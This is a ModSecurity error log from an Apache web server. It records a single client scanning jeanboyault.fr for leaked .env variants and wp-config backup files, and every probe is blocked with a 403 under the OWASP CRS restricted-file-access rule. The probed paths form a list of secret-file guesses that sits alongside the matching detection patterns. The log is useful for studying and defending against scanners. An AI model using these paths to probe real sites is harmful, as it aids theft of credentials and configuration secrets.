[Mon May 11 11:26:33.330027 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:43212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/play/.env.old_old"] [unique_id "agGgyURdw2n9wv6Ai4__qwAAAIg"]
[Mon May 11 11:26:35.320673 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:43212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgyURdw2n9wv6Ai4__qwAAAIg"]
[Mon May 11 11:26:41.686678 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:43258] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /playwright/.env.staging.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/playwright/.env.staging.stage"] [unique_id "agGg0ZkIEwRJMyDaV55GCAAAAUc"]
[Mon May 11 11:26:41.687298 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:43258] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/playwright/.env.staging.stage"] [unique_id "agGg0ZkIEwRJMyDaV55GCAAAAUc"]
[Mon May 11 11:26:43.573192 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:43258] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGg0ZkIEwRJMyDaV55GCAAAAUc"]
[Mon May 11 11:26:43.598469 2026] [security2:error] [pid 1254242:tid 1254259] [client 185.177.72.9:64706] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /playwright/.env.staging.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/playwright/.env.staging.stage"] [unique_id "agGg074KNmD_mZ_vlf8xCAAAAE4"]
[Mon May 11 11:26:43.598694 2026] [security2:error] [pid 1254242:tid 1254259] [client 185.177.72.9:64706] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/playwright/.env.staging.stage"] [unique_id "agGg074KNmD_mZ_vlf8xCAAAAE4"]
[Mon May 11 11:26:44.851547 2026] [security2:error] [pid 1254242:tid 1254259] [client 185.177.72.9:64706] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGg074KNmD_mZ_vlf8xCAAAAE4"]
[Mon May 11 11:26:47.580234 2026] [security2:error] [pid 1254133:tid 1254138] [client 185.177.72.9:64724] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env.debug_new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/plugins/.env.debug_new"] [unique_id "agGg1xjZymfuKpjWXeh0HAAAAMI"]
[Mon May 11 11:26:47.581042 2026] [security2:error] [pid 1254133:tid 1254138] [client 185.177.72.9:64724] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/plugins/.env.debug_new"] [unique_id "agGg1xjZymfuKpjWXeh0HAAAAMI"]
[Mon May 11 11:26:48.754848 2026] [security2:error] [pid 1254133:tid 1254138] [client 185.177.72.9:64724] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGg1xjZymfuKpjWXeh0HAAAAMI"]
[Mon May 11 11:26:48.781736 2026] [security2:error] [pid 1254212:tid 1254218] [client 185.177.72.9:64726] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env.debug_new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/plugins/.env.debug_new"] [unique_id "agGg2EYQeUtAPynIs6xQnwAAAAQ"]
[Mon May 11 11:26:48.782209 2026] [security2:error] [pid 1254212:tid 1254218] [client 185.177.72.9:64726] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/plugins/.env.debug_new"] [unique_id "agGg2EYQeUtAPynIs6xQnwAAAAQ"]
[Mon May 11 11:26:49.998512 2026] [security2:error] [pid 1254212:tid 1254218] [client 185.177.72.9:64726] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGg2EYQeUtAPynIs6xQnwAAAAQ"]
[Mon May 11 11:26:59.769844 2026] [security2:error] [pid 1254242:tid 1254257] [client 185.177.72.9:13130] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /plugins/wp-config.bak1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/plugins/wp-config.bak1"] [unique_id "agGg474KNmD_mZ_vlf8xHAAAAEw"]
[Mon May 11 11:26:59.773293 2026] [security2:error] [pid 1254242:tid 1254257] [client 185.177.72.9:13130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/plugins/wp-config.bak1"] [unique_id "agGg474KNmD_mZ_vlf8xHAAAAEw"]
[Mon May 11 11:27:01.957845 2026] [security2:error] [pid 1254242:tid 1254257] [client 185.177.72.9:13130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGg474KNmD_mZ_vlf8xHAAAAEw"]
[Mon May 11 11:27:01.984166 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:13134] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /plugins/wp-config.bak1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/plugins/wp-config.bak1"] [unique_id "agGg5ZkIEwRJMyDaV55GIAAAAUs"]
[Mon May 11 11:27:01.984606 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:13134] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/plugins/wp-config.bak1"] [unique_id "agGg5ZkIEwRJMyDaV55GIAAAAUs"]
[Mon May 11 11:27:03.195120 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:13134] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGg5ZkIEwRJMyDaV55GIAAAAUs"]
[Mon May 11 11:27:08.065614 2026] [security2:error] [pid 1254133:tid 1254159] [client 185.177.72.9:22574] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postman/.env.production_temp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/postman/.env.production_temp"] [unique_id "agGg7BjZymfuKpjWXeh0KgAAANc"]
[Mon May 11 11:27:08.068269 2026] [security2:error] [pid 1254133:tid 1254159] [client 185.177.72.9:22574] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/postman/.env.production_temp"] [unique_id "agGg7BjZymfuKpjWXeh0KgAAANc"]
[Mon May 11 11:27:09.243832 2026] [security2:error] [pid 1254133:tid 1254159] [client 185.177.72.9:22574] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGg7BjZymfuKpjWXeh0KgAAANc"]
[Mon May 11 11:27:09.269675 2026] [security2:error] [pid 1254179:tid 1254190] [client 185.177.72.9:22582] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postman/.env.production_temp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/postman/.env.production_temp"] [unique_id "agGg7WS6k_SCYd1AVZqm-gAAAQk"]
[Mon May 11 11:27:09.269874 2026] [security2:error] [pid 1254179:tid 1254190] [client 185.177.72.9:22582] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/postman/.env.production_temp"] [unique_id "agGg7WS6k_SCYd1AVZqm-gAAAQk"]
[Mon May 11 11:27:11.500128 2026] [security2:error] [pid 1254179:tid 1254190] [client 185.177.72.9:22582] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGg7WS6k_SCYd1AVZqm-gAAAQk"]
[Mon May 11 11:27:26.134346 2026] [security2:error] [pid 1254133:tid 1254156] [client 185.177.72.9:62748] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env.copy.min"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/prod/.env.copy.min"] [unique_id "agGg_hjZymfuKpjWXeh0OgAAANQ"]
[Mon May 11 11:27:26.134556 2026] [security2:error] [pid 1254133:tid 1254156] [client 185.177.72.9:62748] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/prod/.env.copy.min"] [unique_id "agGg_hjZymfuKpjWXeh0OgAAANQ"]
[Mon May 11 11:27:27.280698 2026] [security2:error] [pid 1254133:tid 1254156] [client 185.177.72.9:62748] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGg_hjZymfuKpjWXeh0OgAAANQ"]
[Mon May 11 11:27:27.302228 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:62750] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env.copy.min"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/prod/.env.copy.min"] [unique_id "agGg_0Rdw2n9wv6Ai4__2wAAAIs"]
[Mon May 11 11:27:27.302645 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:62750] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/prod/.env.copy.min"] [unique_id "agGg_0Rdw2n9wv6Ai4__2wAAAIs"]
[Mon May 11 11:27:28.516946 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:62750] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGg_0Rdw2n9wv6Ai4__2wAAAIs"]
[Mon May 11 11:27:28.543797 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:62752] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env.dev_backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/prod/.env.dev_backup"] [unique_id "agGhABjZymfuKpjWXeh0PAAAAM8"]
[Mon May 11 11:27:28.544087 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:62752] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/prod/.env.dev_backup"] [unique_id "agGhABjZymfuKpjWXeh0PAAAAM8"]
[Mon May 11 11:27:29.727203 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:62752] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhABjZymfuKpjWXeh0PAAAAM8"]
[Mon May 11 11:27:29.753995 2026] [security2:error] [pid 1254212:tid 1254236] [client 185.177.72.9:62756] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env.dev_backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/prod/.env.dev_backup"] [unique_id "agGhAUYQeUtAPynIs6xQvwAAABY"]
[Mon May 11 11:27:29.754205 2026] [security2:error] [pid 1254212:tid 1254236] [client 185.177.72.9:62756] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/prod/.env.dev_backup"] [unique_id "agGhAUYQeUtAPynIs6xQvwAAABY"]
[Mon May 11 11:27:30.955467 2026] [security2:error] [pid 1254212:tid 1254236] [client 185.177.72.9:62756] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhAUYQeUtAPynIs6xQvwAAABY"]
[Mon May 11 11:27:40.721335 2026] [security2:error] [pid 1254179:tid 1254194] [client 185.177.72.9:19092] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env.staging4"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/production/.env.staging4"] [unique_id "agGhDGS6k_SCYd1AVZqnEQAAAQ0"]
